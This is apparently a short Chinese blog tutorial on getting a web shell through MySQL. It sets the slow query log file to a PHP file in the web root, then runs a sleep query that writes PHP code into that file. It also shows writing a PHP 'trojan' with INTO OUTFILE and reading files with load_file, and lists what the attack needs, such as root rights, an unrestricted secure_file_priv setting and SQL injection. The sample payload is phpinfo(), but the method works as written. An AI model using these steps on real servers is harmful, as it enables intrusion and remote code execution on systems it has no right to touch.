Mysql慢日志getshell

show variables like '%slow%';

Variable_name     Value
log_slow_queries     OFF
slow_launch_time     2
slow_query_log     OFF
slow_query_log_file     C:\phpStudy\PHPTutorial\MySQL\data\WIN-374NAWYudt-slow.log

set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';
set GLOBAL slow_query_log=on;

/*set GLOBAL log_queries_not_using_indexes=on;
show variables like '%log%';*/

select '<?php phpinfo();?>' from mysql.db where sleep(10);
慢日志是默认10秒响应则写入

慢日志getshell、日志getshell，都要配合文件包含，因为日志后缀为.log

mysql通过sql语句 into outfile/dumpfile,（dumpfile是用于二进制文件）写入php木马，通过load_file读取文件

select '<?php phpinfo(); ?>' into outfile  '目的文件'  
select load_file('要读取文件路径')

sql文件读写前提

用户权限足够高，尽量具有root权限。
secure_file_priv 选项不对文件读写权限限制
知道绝对物理路径
能够使用联合查询（sql注入时）

本栏目推荐文章
• Jmeter 如何连接mysql数据库？
• 如何通过Navicat把MySQL远程数据库导入到本地数据库
• oracle清除日志
• 【LeetCode 2701. 连续递增交易】MySQL用户变量编程得到严格递增连续子序列的开始位置，结束位置，长度等统计信息
• 【Leetcode 2474. 购买量严格增加的客户】MySQL用户变量编程解决严格递增连续子序列问题
• mysql发生连接异常Cause: com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure
• 【LeetCode 2494. 合并在同一个大厅重叠的活动】MySQL用户变量编程解决区间合并问题
• 如何处理Mysql死锁
• 【LeetCode1747. 应该被禁止的 Leetflex 账户】MySQL用户变量编程；尝试维护一个multiset
• Mysql时间常用函数

getshell Mysql 日志getshell mysql日志 木马getshell方法mysql mysql日志 mysql日志12 mysql日志sql 事务mysql日志 服务器mysql日志 mysql日志cdc 备份mysql日志 随笔mysql日志java